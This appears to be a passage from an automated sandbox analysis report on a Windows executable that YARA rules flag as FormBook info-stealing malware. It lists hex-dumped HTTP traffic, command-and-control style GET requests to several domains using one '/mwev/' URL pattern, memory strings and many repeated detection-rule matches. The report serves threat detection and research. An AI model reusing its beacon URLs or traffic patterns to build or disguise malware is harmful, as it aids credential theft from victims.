74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 02 Dec 2021 19:01:07 GMTContent-Type: text/htmlContent-Length: 275ETag: "618be761-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 02 Dec 2021 19:01:13 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Source: wlanext.exe, 00000007.00000002.920741611.0000000003CA2000.00000004.00020000.sdmp

String found in binary or memory: https://www.foxandmew.com/mwev/?-Zf=rc6cG9leRruTx/YFamCczYYGme6fHdvMbIxv

Source: unknown

DNS traffic detected: queries for: www.royallecleaning.com

Source: global traffic	HTTP traffic detected: GET /mwev/?-Zf=HsmrIALTvXRwIzSnf5nMI/V00TunQUINtH1bLOqGnVursL/6Yec02BWx+TEJbBuPuFeE&v0GTT=9rntXVQxPfS89pvp HTTP/1.1Host: www.royallecleaning.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mwev/?-Zf=Y+Hyy1N7e+ROxQ1BzGerXtl/+e9k+2VYdpmZeNGMnmnYwBGoq47Ntyx8TFdOC4/xH+hS&v0GTT=9rntXVQxPfS89pvp HTTP/1.1Host: www.scion-go-getter.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mwev/?-Zf=iTGszEHgBfgYRglEf8qTe/0GehEi8eYY5QDShU32F6t0wDyeZFMPJI0cijyvgJ5fvuvy&v0GTT=9rntXVQxPfS89pvp HTTP/1.1Host: www.21yingyang.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mwev/?-Zf=muoWufO8p6lksAUPj07m8fqHwDrNKoj9M2hBle0NDwQN4kTZYCe/nJ8SwFL4fqBvjDWp&v0GTT=9rntXVQxPfS89pvp HTTP/1.1Host: www.texascountrycharts.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mwev/?-Zf=/zd6oxG+H6qci+O+cHlZDp/zFP0nYcFn0YDhkjhJJtSXAtrcRYu0trJUidLUZZla0YBM&v0GTT=9rntXVQxPfS89pvp HTTP/1.1Host: www.tikomobile.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mwev/?-Zf=vthKUgsgoRJ92n81Fuh07g/ARRJh8nN5iXUIpLSVgoOHRdB6AKBPErPncdrss3E6nFAH&v0GTT=9rntXVQxPfS89pvp HTTP/1.1Host: www.fulvousemollientplanet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mwev/?-Zf=wD7IX5djK39N0mXOoKckCLddnCt/+mP/xVLK1b09pQyAIyzBpLPKZ8m7O34kMZ4xQV6J&v0GTT=9rntXVQxPfS89pvp HTTP/1.1Host: www.experimentwithoutlimits.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mwev/?-Zf=IXYNpvQ1BiZ44tShy9SgvoX4c9kgPxO5K/+6kCom7tZxGdFtiZvct/5RRpjh/yF5dNln&v0GTT=9rntXVQxPfS89pvp HTTP/1.1Host: www.websitessample.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mwev/?-Zf=rc6cG9leRruTx/YFamCczYYGme6fHdvMbIxv+wAuDzmHDYSO236DISOvOLkKOKiYq/4R&v0GTT=9rntXVQxPfS89pvp HTTP/1.1Host: www.foxandmew.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mwev/?-Zf=IjrmxmCSNg9SW3Y0DfjHEVuIkvJ5tkiLJE48G3emnLXjviiyyOAbNkhdp+PdSxIUf+MM&v0GTT=9rntXVQxPfS89pvp HTTP/1.1Host: www.9linefarms.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mwev/?-Zf=4s7fstVSzLCadPpci11R7qAZUnePXrmWLsX7/7GiC0yrg0b/n74rqRMRm0/pECdGagYy&v0GTT=9rntXVQxPfS89pvp HTTP/1.1Host: www.rip-online.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: 1D4l9eR0W4.exe, 00000000.00000002.664916018.00000000015A0000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 3.2.1D4l9eR0W4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.1D4l9eR0W4.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.1D4l9eR0W4.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.1D4l9eR0W4.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.1D4l9eR0W4.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.1D4l9eR0W4.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.1D4l9eR0W4.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1D4l9eR0W4.exe.44a63d0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1D4l9eR0W4.exe.444edb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000000.662565080.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.663054195.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.690177163.000000000E892000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.713721764.00000000013C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.920015100.0000000002EE0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.703698531.000000000E892000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.713518901.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.920096919.0000000003200000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.919741475.0000000000A70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.713740606.00000000013F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.665552518.0000000004309000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 3.2.1D4l9eR0W4.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.1D4l9eR0W4.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.0.1D4l9eR0W4.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.1D4l9eR0W4.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.0.1D4l9eR0W4.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.1D4l9eR0W4.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.0.1D4l9eR0W4.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.1D4l9eR0W4.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.0.1D4l9eR0W4.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.1D4l9eR0W4.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.1D4l9eR0W4.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.1D4l9eR0W4.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.0.1D4l9eR0W4.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.1D4l9eR0W4.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.1D4l9eR0W4.exe.44a63d0.3.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.1D4l9eR0W4.exe.44a63d0.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.1D4l9eR0W4.exe.444edb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.1D4l9eR0W4.exe.444edb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.662565080.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.662565080.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.663054195.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.663054195.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.690177163.000000000E892000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.690177163.000000000E892000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.713721764.00000000013C0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.713721764.00000000013C0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.920015100.0000000002EE0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.920015100.0000000002EE0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.703698531.000000000E892000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.703698531.000000000E892000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.713518901.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.713518901.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.920096919.0000000003200000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.920096919.0000000003200000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.919741475.0000000000A70000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.919741475.0000000000A70000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.713740606.00000000013F0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.713740606.00000000013F0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.665552518.0000000004309000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.665552518.0000000004309000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: 1D4l9eR0W4.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED

Source: 3.2.1D4l9eR0W4.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.1D4l9eR0W4.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.1D4l9eR0W4.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.1D4l9eR0W4.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.1D4l9eR0W4.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.1D4l9eR0W4.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.1D4l9eR0W4.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.1D4l9eR0W4.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.1D4l9eR0W4.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.1D4l9eR0W4.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.1D4l9eR0W4.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.1D4l9eR0W4.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.1D4l9eR0W4.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.1D4l9eR0W4.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.1D4l9eR0W4.exe.44a63d0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.1D4l9eR0W4.exe.44a63d0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.1D4l9eR0W4.exe.444edb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.1D4l9eR0W4.exe.444edb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.662565080.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.662565080.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.663054195.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.663054195.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.690177163.000000000E892000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.690177163.000000000E892000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.713721764.00000000013C0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.713721764.00000000013C0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.920015100.0000000002EE0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.920015100.0000000002EE0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.703698531.000000000E892000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.703698531.000000000E892000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.713518901.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
